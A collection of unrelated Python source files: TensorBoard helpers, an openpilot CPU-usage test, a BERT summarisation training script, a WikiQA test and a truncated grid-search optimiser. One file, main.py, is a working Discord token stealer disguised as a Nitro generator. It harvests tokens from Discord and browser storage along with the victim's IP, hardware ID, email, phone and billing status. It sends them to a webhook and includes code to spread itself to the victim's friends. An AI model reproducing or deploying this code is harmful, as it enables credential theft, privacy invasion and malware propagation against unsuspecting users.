def parse_event_files_spec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
# Keep this consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir.split(','):
# Check if the spec contains a group name. A spec starting with xyz:// is
# regarded as a URI path spec rather than a group spec. If the spec looks like
# /foo:bar/baz, we assume it's a path containing a colon.
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/'):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(path)
files[path] = run_name
return files
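# Illustrative result of parse_event_files_spec (hypothetical paths; real paths
# are passed through os.path.realpath):
#
#   parse_event_files_spec('train:/tmp/logs/train,/tmp/logs/eval')
#   # -> {'/tmp/logs/train': 'train', '/tmp/logs/eval': None}
#
# The unnamed second entry keeps a run name of None, which reload_multiplexer
# treats as "name the run after its path".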
def reload_multiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
logging.info('TensorBoard reload process beginning')
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logging.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logging.info('TensorBoard done reloading. Load took %0.3f secs', duration)
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
def _reload_forever():
while True:
reload_multiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_reload_forever)
thread.daemon = True
thread.start()
return thread
def get_tensorboard_tag():
"""Read the TensorBoard TAG number, and return it or an empty string."""
tag = resource_loader.load_resource('tensorboard/TAG').strip()
return tag
|
test_cpu_usage.py
|
#!/usr/bin/env python3
import time
import threading
import _thread
import signal
import sys
import cereal.messaging as messaging
from common.params import Params
import selfdrive.manager as manager
from selfdrive.test.helpers import set_params_enabled
def cputime_total(ct):
return ct.cpuUser + ct.cpuSystem + ct.cpuChildrenUser + ct.cpuChildrenSystem
def print_cpu_usage(first_proc, last_proc):
procs = [
("selfdrive.controls.controlsd", 59.46),
("selfdrive.locationd.locationd", 34.38),
("./loggerd", 33.90),
("selfdrive.controls.plannerd", 19.77),
("./_modeld", 12.74),
("selfdrive.locationd.paramsd", 11.53),
("selfdrive.controls.radard", 9.54),
("./_ui", 9.54),
("./camerad", 7.07),
("selfdrive.locationd.calibrationd", 6.81),
("./_sensord", 6.17),
("selfdrive.monitoring.dmonitoringd", 5.48),
("./boardd", 3.63),
("./_dmonitoringmodeld", 2.67),
("selfdrive.logmessaged", 2.71),
("selfdrive.thermald.thermald", 2.41),
("./proclogd", 1.54),
("./_gpsd", 0.09),
("./clocksd", 0.02),
("./ubloxd", 0.02),
("selfdrive.tombstoned", 0),
("./logcatd", 0),
]
r = 0
dt = (last_proc.logMonoTime - first_proc.logMonoTime) / 1e9
result = "------------------------------------------------\n"
for proc_name, normal_cpu_usage in procs:
try:
first = [p for p in first_proc.procLog.procs if proc_name in p.cmdline][0]
last = [p for p in last_proc.procLog.procs if proc_name in p.cmdline][0]
cpu_time = cputime_total(last) - cputime_total(first)
cpu_usage = cpu_time / dt * 100.
if cpu_usage > max(normal_cpu_usage * 1.1, normal_cpu_usage + 5.0):
result += f"Warning {proc_name} using more CPU than normal\n"
r = 1
elif cpu_usage < min(normal_cpu_usage * 0.3, max(normal_cpu_usage - 1.0, 0.0)):
result += f"Warning {proc_name} using less CPU than normal\n"
r = 1
result += f"{proc_name.ljust(35)} {cpu_usage:.2f}%\n"
except IndexError:
result += f"{proc_name.ljust(35)} NO METRICS FOUND\n"
r = 1
result += "------------------------------------------------\n"
print(result)
return r
def all_running():
running = manager.get_running()
return all(p in running and running[p].is_alive() for p in manager.car_started_processes)
return_code = 1
def test_thread():
try:
global return_code
proc_sock = messaging.sub_sock('procLog', conflate=True, timeout=2000)
# wait until everything's started and get first sample
start_time = time.monotonic()
while time.monotonic() - start_time < 120:
if Params().get("CarParams") is not None:
break
time.sleep(2)
first_proc = messaging.recv_sock(proc_sock, wait=True)
if first_proc is None or not all_running():
err_msg = "procLog recv timed out" if first_proc is None else "all car started process not running"
print(f"\n\nTEST FAILED: {err_msg}\n\n")
raise Exception
# run for a minute and get last sample
time.sleep(60)
last_proc = messaging.recv_sock(proc_sock, wait=True)
return_code = print_cpu_usage(first_proc, last_proc)
if not all_running():
return_code = 1
finally:
_thread.interrupt_main()
if __name__ == "__main__":
# setup signal handler to exit with test status
def handle_exit(sig, frame):
sys.exit(return_code)
signal.signal(signal.SIGINT, handle_exit)
# start manager and test thread
set_params_enabled()
Params().delete("CarParams")
t = threading.Thread(target=test_thread)
t.daemon = True
t.start()
manager.main()
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_pretrained_bert import BertConfig
from argparse import ArgumentParser
import distributed
from .models import data_loader, model_builder
from .models.data_loader import load_dataset
from .models.model_builder import Summarizer
from .models.trainer import build_trainer
from .others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers','encoder','ff_actv', 'use_interval','rnn_size']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def multi_main(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' %gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train(args,device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def wait_and_validate(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
valid_iter =data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
print('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter,step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = Summarizer(args, device, load_pretrained_bert=True)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
model.load_cp(checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
else:
optim = model_builder.build_optim(args, model, None)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
trainer.train(train_iter_fct, args.train_steps)
def get_arg_parser() -> ArgumentParser:
parser = argparse.ArgumentParser()
parser.add_argument("-encoder", default='classifier', type=str, choices=['classifier','transformer','rnn','baseline'])
parser.add_argument("-mode", default='train', type=str, choices=['train','validate','test'])
parser.add_argument("-bert_data_path", default='../bert_data/cnndm')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
parser.add_argument("-bert_config_path", default='../bert_config_uncased_base.json')
parser.add_argument("-batch_size", default=1000, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-hidden_size", default=128, type=int)
parser.add_argument("-ff_size", default=512, type=int)
parser.add_argument("-heads", default=4, type=int)
parser.add_argument("-inter_layers", default=2, type=int)
parser.add_argument("-rnn_size", default=512, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-dropout", default=0.1, type=float)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default= 0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-decay_method", default='', type=str)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-world_size", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/cnndm.log')
parser.add_argument('-dataset', default='')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-test_from", default='')
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
return parser
if __name__ == '__main__':
parser = get_arg_parser()
args = parser.parse_args()
args.gpu_ranks = [int(i) for i in args.gpu_ranks.split(',')]
os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if(args.world_size > 1):
multi_main(args)
elif (args.mode == 'train'):
train(args, device_id)
elif (args.mode == 'validate'):
wait_and_validate(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
elif (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test(args, device_id, cp, step)
|
main.py
|
import os
THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))
my_file = os.path.join(THIS_FOLDER, 'NitroGenerationCheck.txt')
file = open("NitroGenerationCheck.txt", "w")
file.write("")
file.close()
with open("NitroGenerationCheck.txt", "w") as file:
file.write("Nitro Generation = Unsuccesful. Maybe try again?")
from os import startfile
startfile( "NitroGenerationCheck.txt" )
#start getting token!
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info:**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info:**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token:**""**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"TokenGrabber v4 By DumbDannyLol",
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "TokenGrabber v4 By DumbDannyLol",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("Your Webhook URL here!", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
test_wikiqa_04_test.py
|
import sys
import tempfile
import unittest
sys.path.append("..")
WORK_DIR = "/tmp/wikiqa-tests"
class TestAll(unittest.TestCase):
def test_test(self):
import json
from src.wikiqa.wikiqa_test import wikiqa_test
shared_path = "/save/out/squad/basic-class/00/shared.json"
run_id = "00"
prepro_dir = WORK_DIR
prev_model_dir = WORK_DIR
sent_size_th = "10"
ques_size_th = "10"
num_epochs = "1"
num_steps = "1"
eval_period = "1"
save_period = "1"
device = "/cpu:0"
device_type = "gpu"
num_gpus = "1"
mlpipeline_metrics_path = tempfile.NamedTemporaryFile()
model_dir = tempfile.mkdtemp()
try:
from multiprocessing import Process
args = (
WORK_DIR,
prepro_dir,
prev_model_dir,
shared_path,
run_id,
sent_size_th,
ques_size_th,
num_epochs,
num_steps,
eval_period,
save_period,
device,
device_type,
num_gpus,
mlpipeline_metrics_path.name,
model_dir,
)
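            # Run wikiqa_test in its own process so any sys.exit() inside it cannot terminate the test run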
p = Process(target=wikiqa_test, args=args)
p.start()
p.join()
except SystemExit:
print("Finished successfully!")
with open(mlpipeline_metrics_path.name, "r") as f:
metrics = json.load(f)
self.assertIn("metrics", list(metrics.keys()))
self.assertEqual(2, len(list(metrics["metrics"])))
self.assertEqual("accuracy-score", metrics["metrics"][0]["name"])
self.assertEqual("loss", metrics["metrics"][1]["name"])
mlpipeline_metrics_path.close()
if __name__ == "__main__":
unittest.main()
|
sgsearch.py
|
import shlex, os, sys
import numpy as np
import math as mathf
import re
from multiprocessing import Process, Queue
from operator import itemgetter
nProc = 1  # number of processors (set this value from outside the module)
final_result = 0.
max_value = []
max_position = []
class Candidate():
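    """Holds one search candidate: its id, current index vector, current/best values and indices, the last two move vectors, and the search depth."""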
def __init__(self,idnum,indx,value,maxindx,maxvalue,prev_move1,prev_move2,depth):
self.idnum=idnum
self.indx=indx
self.value=value
self.maxindx=maxindx
self.maxvalue=maxvalue
self.prev_move1=prev_move1
self.prev_move2=prev_move2
self.depth=depth
def convertLists(tryindx, i,upperx,lowerx):
return ((upperx-lowerx)*float(tryindx+1)/(i+2) + lowerx)
def onebit_rev(in_array,j):
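    # Flip bit j of in_array in place and return the (same, mutated) array.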
for k in range(0,len(in_array)):
if(k==j):
if (in_array[k]==0):
in_array[k]=1
else:
in_array[k]=0
return in_array
def move_mode(prev_move1,prev_move2):
x = np.empty(len(prev_move1),dtype=int)
for k in range(0,len(prev_move1)):
if(prev_move1[k]==0 and prev_move2[k]==0):
x[k]=0
elif(prev_move1[k]==0 and prev_move2[k]==1):
x[k]=1
elif(prev_move1[k]==1 and prev_move2[k]==0):
x[k]=0
else:
x[k]=1
return x
def distance(a,b):
i = 0
for k in range(0,len(a)):
if(a[k] != b[k]):
i = i+1
return i
def procJob2(func, cand, i, newN, upperx, lowerx, q):
result_label = []
for k in newN:
tryindx = cand.indx - cand.prev_move1 + onebit_rev(cand.prev_move1,k)
# print(onebit_rev(cand.prev_move1,k))
print(tryindx)
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
result_label.append([res,onebit_rev(cand.prev_move1,k)])
print(res)
q.put(result_label)
def calcMultiProc2(func, cand, i, N, upperx, lowerx):
listN = list(range(N))
newNs = getDistedList(listN, nProc)
processes = []; queues = []
for n in range(nProc):
newN = newNs[n]
q = Queue()
p = Process(target=procJob2, args=(func, cand, i, newN, upperx, lowerx, q))
processes.append(p)
queues.append(q)
p.start()
result_label = []
for n in range(nProc):
processes[n].join()
result = queues[n].get()
result_label += result
return [result_label, listN]
def onebitrev_search(func,Candidates,i,N,upperx,lowerx,Cands):
result_label = []
for cand in Candidates:
print(cand.idnum)
scoreup_param = 0
linear = cand.prev_move1.copy()
result_label.append([cand.value,cand.prev_move1])
[result_label, kList] = calcMultiProc2(func, cand, i, N, upperx, lowerx)
for n in range(len(result_label)):
if result_label[n][0] < cand.value:
k = kList[n]
scoreup_param = scoreup_param + 1
linear[k] = onebit_rev(cand.prev_move1,k)[k]
# for k in range (0,N):
# tryindx = cand.indx - cand.prev_move1 + onebit_rev(cand.prev_move1,k)
# print(onebit_rev(cand.prev_move1,k))
# print(tryindx)
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# result_label.append([res,onebit_rev(cand.prev_move1,k)])
# print(res)
# if res < cand.value:
# scoreup_param = scoreup_param + 1
# linear[k] = onebit_rev(cand.prev_move1,k)[k]
# print(linear)
if (scoreup_param > 1):
tryindx = cand.indx - cand.prev_move1 + linear
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
result_label.append([res,linear])
print(cand.prev_move1)
print(tryindx)
print(tryx)
print(res)
result_label.sort(key=itemgetter(0))
cand.indx = cand.indx - cand.prev_move1 + result_label[0][1]
cand.value = result_label[0][0]
cand.prev_move2 = result_label[0][1]
cand.depth = i
cand.prev_move1 = result_label[0][1]
result_label.clear()
def getDistSize(value, n):
delta = int(value / n)
dVals = [delta for i in range(n)]
mod = value - (delta * n)
i = 0
while i < mod:
dVals[i] += 1
i += 1
return dVals
def getDistedList(dataList, n):
"""dataListを均等にn分割したリストを返す。"""
dVals = getDistSize(len(dataList), n)
distedList = []
st = 0
for n in dVals:
distedList.append(dataList[st:st+n])
st += n
return distedList
# Job executed by each process
def procJob(n, func, cand, i, procLines, lowerx, upperx, q):
"""各processorが処理するjobの内容。"""
result = []
for move in procLines:
print(move)
tryindx = cand.indx + move
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
# print("proc:"+str(n), tryindx)
# print("proc:"+str(n), tryx)
print("proc:"+str(n), res)
result.append([res,move])
q.put(result)
# Parallel execution
def calcMultiProc(func, cand, i, lines_numpy, lowerx, upperx):
    """Split the work into nProc (number of processors) chunks and run them in parallel."""
    # Distribute lines_numpy among the processes
    newLines = getDistedList(lines_numpy, nProc)
    # Parallel execution
    processes = []; queues = []
    # Submit one job per process
    for n in range(nProc):
        procLines = newLines[n]  # the slice of lines_numpy handed to this process
q = Queue()
p = Process(target=procJob, args=(n, func, cand, i, procLines, lowerx, upperx, q))
processes.append(p)
queues.append(q)
p.start()
    # Collect the result from each process
    result_label = []
    for n in range(nProc):
        processes[n].join()  # wait until process n has finished
        result = queues[n].get()  # fetch the result of process n
result_label += result
return result_label
def comb_search(func,Candidates,i,lines_numpy,N,upperx,lowerx,Cands,pattern):
#--- comb_search(main) ---
result_label = []
for cand in Candidates:
print(cand.idnum)
result_label = calcMultiProc(func, cand, i, lines_numpy, lowerx, upperx)
# for move in lines_numpy: #risuto
# print(move)
# tryindx = cand.indx + move
# tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
# res = func(tryx)
# print(tryindx)
# print(tryx)
# print(res)
# result_label.append([res,move])
result_label.sort(key=itemgetter(0))
cand.indx = cand.indx + result_label[0][1]
cand.value = result_label[0][0]
cand.prev_move2 = cand.prev_move1
cand.depth = i+1
cand.prev_move1 = result_label[0][1]
if (i==1):
cand.maxindx = cand.indx
cand.maxvalue = cand.value
else:
if (cand.maxvalue > result_label[0][0]):
cand.maxindx = cand.indx
                cand.maxvalue = cand.value
if(pattern !="all"):
if(i==1):
for j in range(1,Cands):
Candidates.append(Candidate(idnum=j,indx= result_label[j][1],prev_move1=result_label[j][1],value=result_label[j][0],prev_move2=result_label[j][1],depth=i+1,maxindx=result_label[0][1],maxvalue=result_label[0][0]))
onebitrev_search(func,Candidates,i,N,upperx,lowerx,Cands)
result_label.clear()
return
else:
onebitrev_search(func,Candidates,i,N,upperx,lowerx,Cands)
else:
if(i==1):
temp = cand.prev_move1
# temp_result_label = result_label.copy()
for j in range(1,Cands):
# for k in range(0,N):
# result_label.delete(onebit_rev(cand.prev_move1,j))
result_label = [e for e in result_label if distance(e[1],temp) > 1]
result_label.sort(key=itemgetter(0))
# temp = result_label[0][1]
Candidates.append(Candidate(idnum=j,indx= result_label[0][1],prev_move1=result_label[0][1],value=result_label[0][0],prev_move2=result_label[0][1],depth=i+1,maxindx=result_label[0][1],maxvalue=result_label[0][0]))
result_label.clear()
return
result_label.clear()
def procJob3(func, cand, i, newN, upperx, lowerx,linear ,q):
result_label = []
for k in newN:
tryindx = cand.indx + onebit_rev(linear,k)
# print(tryindx)
tryx = np.vectorize(convertLists)(tryindx,i,lowerx,upperx)
res = func(tryx)
